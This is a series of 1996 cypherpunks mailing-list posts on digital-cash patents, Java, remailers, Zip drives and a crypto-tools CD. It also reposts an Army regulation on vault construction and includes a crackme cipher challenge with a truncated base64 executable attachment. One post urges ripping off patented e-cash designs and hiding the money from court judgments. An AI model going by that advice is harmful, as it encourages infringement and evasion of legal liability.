> At 6:18 AM 3/23/96, Rich Graves wrote:
> > On Sat, 23 Mar 1996, Anonymous wrote:
> >>  <Detweiler stuff.>
> > <Rich's response to Detweiler stuff>
> 
> Uh, Rich?...
> 
> You've probably been detweiled by Detweiler himself.

Gee, really? What makes you think so?

> Someone around here has a concordance program, called MEDUSA, if I remember
> right, which can spot Detweiler pretty well by statistical analysis of the
> words he uses.

Someone has a stylistic spoofing program, called markov, that can produce
output triggering a positive on the MEDUSA test. One of the distributors 
of this program is (or was) qut@netcom.com. 

See the recent posts by "L. Detweiler" in alt.2600, news.groups, and
news.admin.net-abuse.misc. 

This "L. Detweiler" seems to have failed to appreciate how frequently I
write in conscious self-parody, especially as rich@c2.org. His analysis
of the "detweiling" attack is largely correct, but he greatly
overestimated my ego. It'll all come out soon enough, probably about the
time the comet drops under the horizon. 

> > (p.s. I imagine quite a few people will accuse "me" of
> > being detweiler. I assure you my amusement will at least
> > exceed or match that which detweiler ever obtained.)
> 
> 
> ... Which could have been put there on purpose. You Never Know... ;-).
> 
> All this and the fact that he now wants to convert his name into a verb.

Why not? I think it's a useful term. John Crapper's name will always be 
remembered; why not Detweiler's? I think he deserves that kind of 
recognition.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Sun, 24 Mar 1996 14:03:52 +0800
To: cypherpunks@toad.com
Subject: Re: Java questions
In-Reply-To: <Pine.SUN.3.91.960323133624.17748A-100000@eskimo.com>
Message-ID: <9603240538.AA12547@outland.ain_dev>
MIME-Version: 1.0
Content-Type: text/plain


> There has been a lot of discussion on coderpunks about implementing 
> cryptography in Java.  This got me thinking.  We don't see 
> every C++ compiler using the same back end.  So why is 
> everyone licensing Sun's Java implementation?  As a consequence of
> this if there is a bug in Sun's implementation, then that bug 
> exists in every Java implementation.  Imagine a future scenario 

	Why does everyone licensing Microsloth's MS-DOS
implementation?  If (If :) there's a bug in MS's implementation, then
that bug . . . .  It's done, it's available, it (mostly) works.  I
believe that there's a Mac version called Roaster for Macs that even
came out before Sun had a Mac port.

> where a virus/worm takes advantage of a single Java bug and 
> infects 90% of all computers attached to the Internet overnight.
> There may not be much we can do about this, but we should at 
> least be more aware of the possibility.

	But when we get signed classes you'll at least know whom to go
after if it does.

> On a more positive note, has anyone thought of writting a 
> remailer server or client in Java?  It would be really nice if we 
> could run or use a remailer by clicking a link on the web.

	Client would be kinda difficult to do until there's a crypto
lib available.  Either that, or you'd have to load it from local disk
so you could run PGP (the security model for applet hosts such as NS
prevents exec'ing outside programs from code thats loaded from the
network) which kinda defeats the purpose of doing it in Java (aside
from a single cross platform front end).  A server, being a stand
alone app most likely, would be doable but again you'ld need a native
PGP for the crypto.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Lee Jeffers <gjeffers@ns.htc.net>
Date: Sun, 24 Mar 1996 15:36:37 +0800
To: Cypherpunks@toad.com
Subject: e$'s (mini-rant)
Message-ID: <9603240706.AA31508@ns.htc.net>
MIME-Version: 1.0
Content-Type: text/plain


              e$'s (mini-rant)

   I have some thoughts on John Humphrey's post. I thought the big problem
with E$ was with the clearing house. Is it the consensus that it is the e$
patents?  If the problem is that the inventors are sitting on their
patents, then why can't we just RIP THEM OFF$

   When the patent system was started in the U.S., it was done for the
population in order to stimulate the invention process and so improve the
lot of the people. Invention is a SPECIAL kind of production. It is not
normal mass property! Patents are only property because it is considered
that they are of value to the people rather than the owners! Patents pro-
cess was started to give property to patent "owners" in order to persuade
the inventors to invent for the people. If an inventor "SITS ON A PATENT",
then it is ABUSE OF PATENT! Fuck the patent owner! Fuck him with bells on!
RIP HIM OFF! its a noble cause! If this has become a serious problem then
finding techniques of riping off e$ patent owners is a moral and practical
undertaking. Then it should be a topic of Cypherpunks.

   I am not sure that hoarding of patents is the main hinderance of useful
e$. What do other Cypherpunks say? patents? workable e$ schemes! clearing-
houses?

P.S. Maybe doing private Internet business while hiding from the owner of
the e$ patent will be a new privacy concern :-)

P.P.S. Thoughts for a rip-off technique. Take a good private e$ tech.,
restate it in different terms, throw in a few changes, options, extras
so it doesn't look so much like the original. Then offer it to the public
with a variety of very low cost deals - especially for start-ups. By the
time the original inventor gets you into court, you'll have a ton of money
he'll have nothing and with our system of "justice" you can bury him. :-)
Even if he "wins"  - with your privacy skills you can take it with you and
hide it - talk to Duncan Frissell. Note: You'll have the money to talk to
Duncan, the original inventor won't. :-)

P.P.P.S Why not just take the best features of several private e$ tech.s
and make a hybrid? It wouldn't even be plaguerism! (sorry, I lost my dict-
ionary).


Central power is stolen freedom.
THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY.
The United States "Federal" Government - We'll be even more American
without it.

                                           PUSH EM BACK! PUSH EM BACK!
                                           WWWAAAYYYY  BBBAAACCCCK!
                                           BBBEEEAAATTTT  STATE!

                                           Gary Jeffers






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 24 Mar 1996 17:35:10 +0800
To: Gary Lee Jeffers <gjeffers@ns.htc.net>
Subject: Re: e$'s (mini-rant)
Message-ID: <199603240924.BAA27180@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:00 AM 3/24/96 -0600, Gary Lee Jeffers <gjeffers@ns.htc.net> wrote:
>              e$'s (mini-rant)
>   I have some thoughts on John Humphrey's post. I thought the big problem
>with E$ was with the clearing house. Is it the consensus that it is the e$
>patents?  If the problem is that the inventors are sitting on their
>patents, then why can't we just RIP THEM OFF$

Yes, it's the patents.  Chaum owns them, and he's not Easy To Do Business With.
On the other hand, a couple of banks _have_ recently started doing business
with him - Mark Twain Bank in St. Louis, and Merita Bank in Finland - check the
cypherpunks archives (www.hks.net / nntp.hks.net) for details.  There were a
couple of earlier attempts, in which one group discovered that there are an
appalling number of banking laws which make it hard to get a real bank started,
and another group discovered that it's much easier to be a Credit Union than
a Bank under US banking law, but it's still hard to get a business model
that's likely to make non-negative amounts of money that way.

The reason you can't just rip them off (unlike, say, PGP's early relationships
with RSADSI/PKP) is that electronic commerce can only work well if it's
legitimate -
if you want real businesses to deal with you, and real banks to handle money 
for you, they need to be assured that they won't lose their assets in a
patent lawsuit.
On the other hand, Doug Barnes posted some interesting articles on
"agnostic banking", a variant on Chaum's digicash where the bank
can run simpler digital cash protocols that don't violate Chaum's patent,
but the bank can't tell whether the customer is using Chaum's blinded signatures
or not, so the customer can rip off Chaum's intellectual property without
the bank having to be knowledgeable or involved (nudge, nudge, wink, wink.)

On a non-financial level, Chaum didn't complain about the Magic Money / 
Tacky Tokens demos that some of the cypherpunks did, and Digicash came out with
a play-money version that some of us used before the commercial deal was done.

> [patent rant]
Yeah, yeah, many of us can rant against patents as well.  Been there, done that,
even invented stuff and found somebody else had previously invented and
patented it.
The League for Programming Freedom has some high-quality detailed patent rants,
and if you give RMS a grant for airfare he'd probably be happy to go picket
Chaum's company for you :-)

As far as Chaum hoarding the patents, he's always been willing to deal,
but since he's mostly an academic rather than a businessman, he's set a very
high up-front price so little guys don't bother him, only mega-banks that will
come now that he built it.  I'd guess the prices the banks he's now dealing
with paid
are rather lower than that, but it's a start for getting real business to
evolve.

#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissible."  - US government statement on China...

"SigFiles of Unusual Size?  I don't believe they exist!"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Sun, 24 Mar 1996 18:21:55 +0800
To: cypherpunks@toad.com
Subject: Crypto CD
Message-ID: <Pine.A32.3.91.960324013306.50010C-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain



   I'm considering the idea of cutting a crypto CD, and wanted to see if 
there was any potential interest in the idea, or not. Basically what i 
forsee is a disk with the basic algorithms (DES/IDEA/Etc), and steg tools, 
along with a few large crypto aps like PGP, and basic cracking software (Crypt 
Breakers Work Bench, XOR-type crackers, and dictionary attacks with 
a few dozen dictionaries). I'd also like to include a remail directory 
with some remailer sources, remailer-aware clients, and the mixmaster 
sources. And of course as much infomation as possible -- cyphernomicon 
preferably, possibly even archives of this list..  

I would plan to put unix/dos/mac all on one CD. I'm thinking that 
realistically I can expect 50 megs or so. Possibly as much as 100 if I 
find a TON of wonderful text. 

Could be useful to individuals, as well as for groups wishing to create 
FTP sites etc. 

Pricing with shipping would wind up around US$20.00, give or take 5 dollars..

I'd like to know first off whether such a thing already exists. Secondly 
whether anyone would be interested in possesing such a thing. And lastly 
any suggestions for/about content that I may have missed..



Thanks
Benji





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 24 Mar 1996 18:18:48 +0800
To: Bill Stewart <gjeffers@ns.htc.net>
Subject: Re: (X:x)e$ 's other use
Message-ID: <199603241007.CAA05877@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  1:31 PM 3/23/96 -0800, Bill Stewart wrote:
>Method 3 you'll recognize.  There'd be nothing wrong with the Federal 
>Reserve if they only used methods 1 and 2; individual consumers can
>decide whether to trust them not to print a lot more zeros than they should.
>And they don't have a monopoly on currency - there are some kinds of
>taxes that apply to some private currencies, but you can go into the
>average bank today, ask them to write a cashier's check to someone
>(and probably still to "bearer"), pay them, and they'll be happy to do it
>for only a small commission, and American Express will do it as well.
>And people will take their paper, though in the case of traveller's checks
>it's sometimes a hassle to accept on an occasional basis.

My experience in China in 1993 was that US Federal Reserve Notes were easy
to use and American Express Traveler's checks were not.  After hearing that
the dollar isn't worth anything, it was refreshing to go to a country where
they are in high demand.  I recommend carrying good old fashioned USA
dollars when going to communist countries.

Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 24 Mar 1996 18:23:13 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: protection on IoMega ZIP drives
Message-ID: <v02140b00ad7a8191950e@[165.254.158.231]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:45 3/23/96, Alan Olsen wrote:

>The big problem is with the zip drivers.  There is some sort of
>incompatibility between SFS and the zip drivers.  (I hacked on it for a
>couple of hours with no luck.)  Win95 makes the problem worse, as it is
>difficult to judge just when the driver for the zip drive loads.  (I have a
>number of complaints about the zip drive drivers.  Lack of documentation is
>one of them...)


I can state that with a Zip Disk formatted for Macintosh use (and the drive
plugged into a Macintosh), the drive and disk are seen by the Macintosh as
a NORMAL SCSI HD and eligible for use as a Boot Drive (ie: There is a Mac
Driver on the Disk in a SCSI Driver Partition). I've Booted from a ZIP Disk
so this is actual not just theoretical <g>. I'd assume that if a Wintel
Machine had the Microcode to be able to boot off an external SCSI Drive
(something I do not know is normal for Wintel machines as it is normal for
Macintosh ones) the same situation would exist for Wintel Zip Formatted
Disks. All NORMAL SCSI HDs (or Cartridges) have their driver in a Driver
Partition so the HD/Cartridge can be read.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sun, 24 Mar 1996 03:43:53 +0800
To: cypherpunks@toad.com
Subject: ar380-5.aip.html
Message-ID: <199603231914.GAA14103@suburbia.net>
MIME-Version: 1.0
Content-Type: text/plain



AR 380-5 Appendix H Classified Document and Materiel Storage

Standards and Information

AR 380-5 Section I
Minimum Class A, B, and C Vault Construction Standards

AR 380-5 H-1. Consolidated masonry vault specifications
These specifications are given in table H-1.


===============================================================================
=================

Class  Approved storage lev-                              Thicknesses
       el

                              Floors                 Walls
Ceiling

A      TOP SECRET             8"RC(1)            8"RC              8"RC

B      SECRET                 4"RC               8"(2)             4"RC

C      CONFIDENTIAL           4"C(1)             8"(3)             4"RC
-------------------------------------------------------------------------------
-----------------
Legend: RC = Reinforced concrete; C = Concrete without reinforcement
Notes:
(1) All concrete  used in vault  construction will  be monolithic  cast in
place,
Class A,  con-
forming to  US Army Corps of  Engineers Specification C.E.  204 (minimum
compressive strength  of
3000 psi after  28 days of aging). Reinforcing will  be by minimum 5/8-inch
diameter steel  rein-
forcing bars  (rebars) laid  a maximum of  6 inches  on centers, creating  a
cross-hatched  steel
curtain, to  be sandwiched at half  thickness of the concrete,  parallel to the
longest  surface.
Rebars will be anchored or imbedded in all contiguous walls/surfaces.
(2) Class B vault walls will be constructed of masonry at least 8 inches thick,
such  as brick or
concrete block employing adequate bond. Hollow masonry, only of the  vertical
cell
(load bearing)
type, can also be  used, but if used, each cell  will have from ceiling to
floor
1/2-inch diame-
ter or  larger rebar  inserted, and then  be filled with  pea gravel  and
Portland
cement  grout.
Rebars will be  anchored in both floor and  ceiling to a depth of  at least 4
inches. In  seismic
areas, 6-inch or thicker RC will be required.
(3) Class C vault walls will be  constructed of thick-shell concrete block or
vertical  cell clay
tile and be not less than 8 inches thick. In seismic areas,  6-inch or thicker
RC
will be used.
===============================================================================
=================



AR 380-5 H-2. Lightweight alternate Class A vault specifications
Interim lightweight alternate class A and B vault specifications
(for use above ground level only). Where building structural
design factors preclude the use of a standard class A or B  vault
design at above ground level locations, a modular vault-ASTM type
I, U.L. class-M approved under ANSI/UL Standard 608, dated 27 June
1983 or later, may be used. Until final testing of this product  is
completed, it will not be used in lieu of the conventional
designed vaults, at or below grade. Existing steel lined rooms,
built to previously approved specifications, will continue to be
approved for use, but further construction of steel liners will be
deferred in favor of the above specified ANSI/UL Standard 608
product.

AR 380-5 H-3. Doors for both methods of vault construction
The vault will be equipped with an approved vault door of the  type
presently listed on the Federal Supply Schedule. The Class 5 vault
door will be used with reinforced concrete vaults. Where weight of
construction is a factor and a steel-lined vault is used, a Class
6 vault door may be used, if obtainable. Normally, a vault should
have only one entrance. When a vault exceeds 1,000 square feet of
floor space or has more than eight occupants, it should have a
minimum of two exits (one of which will be the entrance) for
safety purposes. When more than one entrance is required, each
must be equipped with the approved door, but only one door will  be
used for normal access. The use of a vault door for controlling
movement into and out of a facility is not authorized as this
continued use will create undue wear on the door and will
eventually weaken the locking mechanism and cause malfunctioning.
Therefore, a vestibule should be constructed at the entrance with
an access door to achieve control when the vault door is open.
Where building codes require that the vault entrance meet a
specified fire rating, the vestibule and its access door must be
of the required fire rating. Where permissible, the vault door
optional day gate may be employed as the entrance control in lieu
of the above vestibule. There will be no windows in a vault,  and
all ventilator openings or other access routes into the vault will
be properly treated to deny unauthorized access. Sound attenuation
will be fully employed and where inadequate, white noise masking
will be added to prevent classified discussions from being
overheard.

AR 380-5 H-4. Additional security safeguards for vaults
All vaults designated Class A or B will have intrusion and fire
protection. In addition, when a vault is unattended, the areas
contiguous to such vault will be supervised either by frequent
routine guard patrols or electronic means so as to increase the
depth of security and to allow early detection of trespass.
Detection of trespass outside the vault is preferred to detection
of vault penetration, since response to the former should preclude
the latter. Detection systems that indicate attempted penetration
(such as vibration sensors) are acceptable, provided they allow
adequate response time before actual barrier violation.

AR 380-5 H-5. Security assistance
If requested in writing, additional technical advice and guidance
relative to vault security problems, may be obtained from the
Commander, Intelligence Materiel Activity (IMA), ATTN: AMXIM-PS,
Fort Meade, MD 20755.


AR 380-5 Section II
Security Upgrading Via Construction-Buildings, Offices, and
Rooms

AR 380-5 H-6. Approved standards for security upgrading
The following guidance is offered as a norm against which-
 a. To  evaluate  the  adequacy  of  existing  structural  security
safeguards.
 b. To provide security guidance for new construction in areas
which will contain activities and material of foreign intelligence
interest.

AR 380-5 H-7. Hardware
Heavy-duty builder's hardware should be used in construction, and
all screws, nuts, bolts, hasps, clamps, bars, 2-inch-square mesh
of No. 11 wire, 18-gauge expanded metal screen, hinges, pins,
etc., should be securely fastened to preclude surreptitious
removal and ensure visual evidence of tampering. Hardware
accessible from outside the area should be peened, pinned, brazed,
or tack-welded to preclude removal. The term ""2-inch-square mesh
of No. 11 wire,'' which meets the requirements of Federal
Specification RR-F-191d, 17 June 1965, hereinafter shall be
referred to as ""wire mesh.''

AR 380-5 H-8. Interior walls
Construction should be plaster, gypsum wallboard, metal panels,
hardboard, wood, plywood, or other opaque materials offering
similar resistance to, and evidence of, unauthorized entry into
the area. If insert-type panels are used, a method should be
devised to prevent the removal of such panels without leaving
visual evidence of tampering. Area barriers up to a height of 8
feet should be of opaque or translucent construction where visual
access is a factor. If visual access is not a factor, the  area
barrier walls may be of wire mesh or other nonopaque material
offering similar resistance to, and evidence of, unauthorized
entry into the area.

AR 380-5 H-9. Windows
Window openings 18 feet or less from an access point (for example,
another window outside the area, roof, ledge, door, and so forth)
should be fitted with 1/2-inch bars (separated by no more than 6
inches), plus crossbars to prevent spreading, or 18-gauge expanded
metal screen, or wire mesh securely fastened on the inside. When
visual access is a factor, the windows should be kept closed and
locked at all times, and also should be made translucent or opaque
by any practical method such as painting or covering the inside of
the glass. During nonduty hours the windows should be closed and
securely fastened to preclude surreptitious removal of classified
material.


AR 380-5 H-10. Doors
Doors should be substantially constructed of wood or metal. When
windows, panels, or similar openings are used in the door, they
should be secured with 18-gauge expanded metal screen or wire mesh
securely fastened on the inside. If visual access is a factor, the
windows should be translucent or opaqued. When doors are used in
pairs, a mullion insert anchored top and bottom should be
installed between the doors.

AR 380-5 H-11. Door louvers or baffle plates
When used, they should be reinforced with 18-gauge expanded metal
screen, or wire mesh fastened inside the area.

AR 380-5 H-12. Door locking devices
 a. Entrance  doors should be  secured with  either a  GSA-approved
built-in, three-position,  dial-type, changeable combination  lock;
a  GSA-approved  combination  padlock  (per  paragraph   5-101)  as
amended  and  as  specified in  paragraph  5-102d;  a  key-operated
padlock  or locking  device with  high security  cylinder and  hasp
(see figure H-1) as described in the same paragraph;  or a built-in
1-inch throw,  deadbolt lock equipped  with the GSA-approved  high-
security  cylinder; or  preferably a  combination  of these.  Other
doors should be  firmly secured from the  inside with a panic  bolt
(actuated by a  panic bar), a deadbolt,  a rigid wood or metal  bar
(fitted to preclude  ""springing''), extending across the width  of
the door and  held in position by  solid clamps, preferably on  the
door  casing,  or  other means  approved  by  the  cognizant  OPSEC
Support Unit and Fire Marshal.
 b. The new High-Security Padlock approved July 1982 became
available within the supply system late fall 1982. It has the same
Federal Stock Number as the Sargent and Greenleaf (S&G) Model 831B
Padlock, which is being phased out of service.

AR 380-5 H-13. Ceilings
Ceilings should be constructed of plaster, gypsum wallboard
material, panels, hardboard, wood, plywood, ceiling tile, or other
material offering similar resistance to and detection of
unauthorized entry. Wire mesh, 18-gauge expanded metal screen, or
other nonopaque material offering similar resistance to, and
evidence of, unauthorized entry into the area may be used if
visual access to classified material is not a factor. When wall
barriers do not extend to the ceiling, and a false ceiling is
used, this false ceiling should be reinforced with wire mesh or
18-gauge expanded metal screen, alarmed and otherwise secured with
heavy-duty builder's hardware. (This measure also applies when
panels are removable, and entry can be gained into the area
without visible detection.) When wire mesh or expanded metal
screens are used, they must be secured to adjoining walls in a
manner which precludes removal without leaving evidence of
tampering. In those instances where barrier walls of an area
extend to a solid ceiling, there is no need to reinforce a  false
ceiling; however, an Intrusion Detection System (IDS) should
monitor this otherwise unobserved area.

AR 380-5 H-14. Ceilings (unusual cases)
It is recognized that instances may arise where activities have a
valid justification for not erecting a solid suspended ceiling as
part of the area, especially in high-ceiling hangars. The activity
may contend that the use of a suspended ceiling is impractical
because of production methods, such as the use of overhead cranes
for moving bulky equipment within the area. Cases also exist where
the air conditioning system may be impeded by the construction of
a solid suspended ceiling (such as ADP centers). At times, even
the height of the classified material may make a suspended ceiling
impractical. In such cases, special provisions should be made to
ensure that surreptitious entry cannot be achieved by entering the
area over the top of the barrier walls (for example, employ
approved intrusion detection systems, sensors, and more frequent
guard patrols). Areas of this type should be closely scrutinized
to ensure that the structural safeguards are adequate to preclude
entry via adjacent pipes, catwalks, and ladders, or to preclude
observation, if visual access is a factor.

AR 380-5 H-15. Miscellaneous openings
Where ducts, pipes, registers, sewers, and tunnels are of such
size and shape as to permit unauthorized entry (in excess of 96
square inches, for example), they will be secured by 18-gauge
expanded metal screen, wire mesh, or where more practical steel
bars at least 1/2-inch in diameter with a maximum space of 6
inches between the bars. The steel bars will be securely fastened
at both ends to preclude removal, and will have 1/4-inch thick by
1-1/2-inch wide steel crossbars at 18-inch intervals to prevent
spreading. When wire mesh, expanded metal screen, or steel bars
are used, installation should ensure that classified material
cannot be removed through the openings with the aid of any type  of
instrument. Care also will be taken to ensure that a barrier
placed across any waterway (sewer or tunnel) will not cause
clogging or offer obstruction to the free flow of water or sewage.

AR 380-5 H-16. Approved alarm systems
Information and limitation  on use of approved intrusion  detection
systems, both  commercial and DOD J-SIIDS  equipment, can be  found
in  DIA  Manual  50-3,  chapter  III,  dated  2   May  1980.  Model
designations of items  specifically approved for use in  protection
of U.S.  classified information and material  are provided in  that
chapter,  along  with other  pertinent  information.  All  detailed
information relative to  an alarmed area and the electronic  system
protecting its  classified defense  information or materiel  (i.e.,
electrical  diagrams  indicating  wire  runs,  sensor  and  control
placements, as  well as sensor  types and  area of coverage,  floor
plans, and photographs revealing the position or  existence of such
items within the  area), will be tightly controlled and  marked For
Official Use Only.


               Figure H-1. New high-security padlock










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Mott <thecrow@iconn.net>
Date: Sun, 24 Mar 1996 22:49:01 +0800
To: cypherpunks@toad.com
Subject: private key encryption program for you to hack at
Message-ID: <3155621F.5FA2@iconn.net>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3939.1071713560.multipart/mixed"

--Boundary..3939.1071713560.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

Ok, I have been working on this for a while, and I wanted to let you 
guys have a go at it. I wrote a private key encryption program that I 
think should be hard to break, I will provide you with the EXE (MS DOS) 
file, some ciphertext, AND a big chunk of plaintext. The key is not 
ridiculously large, but it won't be anything obvious so don't bother 
brute forcing. 
	To encrypt, the program read in some system/time specific info, 
uses it to encrypt the file along with the key.  It then write the 
system/time specific info to the end of the file encrypted with the key. 
I THINK that the only weaknesses should be predicitability of the 
system/time info, or possibly finding patterns in the encrypted values. 
 I dont want to give out any source code yet, but it anyone wants some 
pieces of it just ask. crackme.zip file with paradox.exe, cipher.txt, 
and plain.txt

-- 
 ___  ___    _____      		
/   \/   \  /     \
    ||      |     
    ||      | 
    ||      |      
    ||he    \_____/row

thecrow@iconn.net
"It can't rain all the time"


--Boundary..3939.1071713560.multipart/mixed
Content-Type: application/octet-stream; name="zip00000.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="zip00000.zip"
Content-Description: "Crackme.zip"

UEsDBBQAAgAIAHdLeCCw6BsuQ0UAAEBsAAALAAAAUEFSQURPWC5FWEXUvAtY
U1f2PrxzDyECikUUhYgaL1FUUFQuiheibZXiDbxirWJra6UTEqgzCqFxRpOj
TtWZXmR+M1rbaSvtDLbaQZ1qNCgoRQGtgniroh48VlEU5GLyf/c5CRfH9vd/
5vme73u+4Hsue++1L2vtvdY66+zjjAVxZAz5WPQG+affP/O9/UkcIa2BhPQm
hCwEXgVSgTRgO/A58CNwDWgBvESEDACGALOATOA9YAuwHfgL8AnwJXAQKAHK
gAvALeAjGSF/A/KB/cC/gVKgAqgC7gD3gQZAISdEDfgD/YHBwAhgIqAHEoGl
wAogE1gLbAa2AbuBL4ADwGGgGDgDXANuAneBp4BYgTEBPYDeQD9gFDAOiAMS
gNnAAuAt4B0gB/gDsBnIBXYCnwMFwPdAIVABXACuAPeBR0ALbUtJiA/wAqAF
dEA4EAfEA9OBxcBrQDrwLpANfArkAfnAfoAFHgCNgMyLEBXgCwQCwUAEkAQs
BH4DZAAM8D7wGbAHOAIUAlXAFeA+MM+bkCXAO4AJWAtsBrYBHwN7gH8C3wFF
wA9AFXALeAx4qwnpC4wBZgDLgDcAE/Ae8BHwP8CnwDfAv4DDwBngHFAN1AL3
gMeAvAvqBLoBvYH+gA4YBbwIJABzgdeBVUA6sB74I7AT+Az4CvgeOAacBSqB
q8ADoAF4StvwISQI0AADgbFALDAFmAssANKANYAFOATYgdNALdAAPAW8fCFf
QAOMAhKBxcBy4B3ABPwe2AZ8CnwJHALswBngMvAQaAScwE9+uAaUXQnpAgQD
/YAhwBhgIrAUWA1Ygd3AReAqUAPcBVoBSTdCugM9AQ0wHIgBZgFLgBVAJrAW
sAB/BP4BfA/cAR4DI/wJmQCsAjKBfwD7gRNACVABNAOB3QmJBJKBFCANMAK/
AwqAQuA0cB8gL2D+Ar5AdyAYGA6MAqKBOGABsBzYAxQBLOAEggIwH4BhQDgw
CxD3AP8Bf2AEMBmYBiwEXgVeB94F1gHrgT8DO4BdwL8AB1AMVAE3gTuAC4iC
jnQB0p6QMdANCAUGAomAAcgENgKbgW3Ax8Ae4J/APuAAcBS4A9wHFL3Ad+A3
wHfA98BZoA5oAsRBKAOogf7AYCACGAvMBRYARmANUAncAAZBkQ8H4oHXgLcA
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
